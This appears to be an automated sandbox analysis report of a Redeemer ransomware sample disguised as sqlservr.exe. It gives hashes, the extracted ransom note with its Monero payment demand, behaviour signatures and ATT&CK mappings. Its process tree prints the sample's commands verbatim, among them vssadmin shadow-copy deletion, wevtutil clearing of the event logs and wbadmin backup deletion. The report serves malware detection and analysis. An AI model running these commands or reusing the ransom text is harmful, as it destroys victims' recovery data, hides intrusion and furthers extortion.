Analysis

  • max time kernel
    36s
  • max time network
    163s
  • platform
    windows10_x64
  • resource
    win10-en
  • submitted
    20-09-2021 03:04

General

  • Target

    sqlservr.exe

  • Size

    1.8MB

  • MD5

    e1338c42da2d2363afbbd0eeabad1ca9

  • SHA1

    fe5d669b732c9227bb25787083906f49b732c335

  • SHA256

    61c47effdf6b6eafd20e74a8a6b52da09e082fefef31c6ae4a2046b6a756050e

  • SHA512

    bcc887777c3bcb778000893c15357abcc9a78009a1cd8ae325de787a918d98ded1100fe9b21b79b16fe1d44d5d9fe0147292164ff36cf12a13e9e31b02ed372a

Malware Config

Extracted

Path

C:\Read Me.TXT

Ransom Note
8888888b. 888 888 Y88b 888 888 888 888 888 d88P .d88b. .d88888 .d88b. .d88b. 88888b.d88b. .d88b. 888d888 8888888P" d8P Y8b d88" 888 d8P Y8b d8P Y8b 888 "888 "88b d8P Y8b 888P" 888 T88b 88888888 888 888 88888888 88888888 888 888 888 88888888 888 888 T88b Y8b. Y88b 888 Y8b. Y8b. 888 888 888 Y8b. 888 888 T88b "Y8888 "Y88888 "Y8888 "Y8888 888 888 888 "Y8888 888
Made by Cerebrate - Dread Forums TOR [http://dreadytofatroptsdj6io7l3xptbet6onoyno2yv7jicoxknyazubrad.onion/]
[Q1] What happened, I cannot open my files and they have an odd extension?
[A1] Your files have been encrypted by Redeemer, a new ransomware operation.
[Q2] Is there any way to recover my files?
[A2] Yes, you can recover your files. This will however cost you money in XMR (Monero).
[Q3] Is there any any way to recover my files without paying?
[A3] Without paying it is impossible your files. Redeemer uses most secure algorithms and a sophisticated encryption scheme which guarantees security. Without a proper key, you will never regain access to your files.
[Q4] What is XMR (Monero)?
[A4] It is a privacy oriented cryptocurrency. You can learn more about Monero on getmonero.org. You can view ways to purchase it on www.monero.how/how-to-buy-monero.
[Q5] How will I decrypt my files?
[A5] Follow the general instructions:
-1. Buy 02 XMR.
-2. Contact helpdecryptmyfiles@yandex.com and send the following key:
-----BEGIN REDEEMER PUBLIC KEY-----
MTAK4k1pfaewqYz8kbtiZBAJ2bLqybEnTQUjkVbRp0QudQEkTo
2bnZAYmruQNo390d3jhST98DGo+eH6f3eMZ+3eVq6PbOLOYBwY
WHHPIOV02IWPGO4917ixFp0LD6ceyEVfSWjoBjDLlBPXqJMJ89
x28YDv21MV0Jy9o4GMDVuLjfKiroFJT2sCFn+foWf4UM24SiYg
jeQRvHA5i8enWNh+Jljb9zFE7h/vBKYSwbJrUoPloyWkrFq6w6
oTzs0bmP+2pCjZEVSB7CSmxpJnvJyur6jO932S/HQmwz+8B5s8
8+kfm4CPvejmkHsLZQhgsGVd5cCRoWFGCxUW/8B7jGE+LcrETn
WIivmN4h2yuiTpaotewcmnOlaF+Mg36AWmyk9BjAy7KpE26yAx
kYXfNPBFEQ4Xk3oIPlvtqYkDZ7LuNSZrbkrFqzBSkStOGfxElV
F12dAstpole9XGWmaKAyDsOYTJBon3USW9xGzTrAe4CtqRQHOw
ShY/OSFeHX8i74V1REVCWkSOPSFYPC49PSByio1tZ54rcMknBe
xCqIDpLrqxTanfrRTJLqwXD4X6Mg+PJZIvYAgzVGeVac3szUl9
iwCRsSK1CB4in+mbvVvEmQ9PQgEagMW+HbhNk01KhAKpwQmZdX
NLx+4cbVO4J9fURsgaRc/I/jNv2ifelKMJWQ==
-----END REDEEMER PUBLIC KEY-----
-3. You will receive an XMR address where you will need to pay the requested amount of Monero.
-4. After you pay and the payment is verified, you will receive a decryption tool and a key which will restore all your files and your computer back to normal.
Emails

helpdecryptmyfiles@yandex.com

Signatures

  • Clears Windows event logs 1 TTPs
  • Deletes shadow copies 2 TTPs

    Ransomware often targets backup files to inhibit system recovery.

  • Executes dropped EXE 1 IoCs
  • Modifies extensions of user files 3 IoCs

    Ransomware generally changes the extension on encrypted files.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Deletes itself 1 IoCs
  • Modifies WinLogon 2 TTPs 4 IoCs
  • Drops file in Windows directory 3 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Interacts with shadow copies 2 TTPs 1 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

  • Modifies registry class 8 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 45 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\sqlservr.exe
    "C:\Users\Admin\AppData\Local\Temp\sqlservr.exe"
    1⤵
    • Checks computer location settings
    • Drops file in Windows directory
    • Modifies registry class
    • Suspicious use of WriteProcessMemory
    PID:4044
    • C:\Windows\WIN_TEMP_\svchost.exe
      "C:\Windows\WIN_TEMP_\svchost.exe" C:\Users\Admin\AppData\Local\Temp\sqlservr.exe
      2⤵
      • Executes dropped EXE
      • Modifies extensions of user files
      • Deletes itself
      • Modifies WinLogon
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1256
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c vssadmin delete shadows /All /Quiet
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3876
        • C:\Windows\SysWOW64\vssadmin.exe
          vssadmin delete shadows /All /Quiet
          4⤵
          • Interacts with shadow copies
          PID:2244
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c wevtutil clear-log Application
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4064
        • C:\Windows\SysWOW64\wevtutil.exe
          wevtutil clear-log Application
          4⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:3892
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c wevtutil clear-log Security
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:636
        • C:\Windows\SysWOW64\wevtutil.exe
          wevtutil clear-log Security
          4⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:4012
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c wevtutil clear-log Setup
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:840
        • C:\Windows\SysWOW64\wevtutil.exe
          wevtutil clear-log Setup
          4⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:988
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c wevtutil clear-log System
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:676
        • C:\Windows\SysWOW64\wevtutil.exe
          wevtutil clear-log System
          4⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:1056
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c wbadmin delete catalog -quiet
        3⤵
        PID:3880
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c wbadmin delete systemstatebackup -deleteoldest -quiet
        3⤵
        PID:1208
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c ftype redeemer="C:\Windows\system32\cmd.exe" /c msg * Redeemer Ransowmare - this file cannot be opened until decrypted. Check ReadMe.TXT for more details how to decrypt your file.
        3⤵
        • Modifies registry class
        PID:1280
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c assoc .redeem=redeemer
        3⤵
        • Modifies registry class
        PID:1308
  • C:\Windows\system32\vssvc.exe
    C:\Windows\system32\vssvc.exe
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    PID:3724

Network

MITRE ATT&CK Matrix ATT&CK v6

  • Persistence
    Winlogon Helper DLL (1) T1004
  • Defense Evasion
    Indicator Removal on Host (1) T1070
    File Deletion (2) T1107
    Modify Registry (1) T1112
  • Discovery
    Query Registry (1) T1012
    System Information Discovery (2) T1082
  • Impact
    Inhibit System Recovery (2) T1490

Downloads

  • C:\Windows\WIN_TEMP_\svchost.exe
    MD5

    e1338c42da2d2363afbbd0eeabad1ca9

    SHA1

    fe5d669b732c9227bb25787083906f49b732c335

    SHA256

    61c47effdf6b6eafd20e74a8a6b52da09e082fefef31c6ae4a2046b6a756050e

    SHA512

    bcc887777c3bcb778000893c15357abcc9a78009a1cd8ae325de787a918d98ded1100fe9b21b79b16fe1d44d5d9fe0147292164ff36cf12a13e9e31b02ed372a

  • memory/636-122-0x0000000000000000-mapping.dmp
  • memory/676-126-0x0000000000000000-mapping.dmp
  • memory/840-124-0x0000000000000000-mapping.dmp
  • memory/988-125-0x0000000000000000-mapping.dmp
  • memory/1056-127-0x0000000000000000-mapping.dmp
  • memory/1208-129-0x0000000000000000-mapping.dmp
  • memory/1256-115-0x0000000000000000-mapping.dmp
  • memory/1280-130-0x0000000000000000-mapping.dmp
  • memory/1308-131-0x0000000000000000-mapping.dmp
  • memory/2244-119-0x0000000000000000-mapping.dmp
  • memory/3876-118-0x0000000000000000-mapping.dmp
  • memory/3880-128-0x0000000000000000-mapping.dmp
  • memory/3892-121-0x0000000000000000-mapping.dmp
  • memory/4012-123-0x0000000000000000-mapping.dmp
  • memory/4064-120-0x0000000000000000-mapping.dmp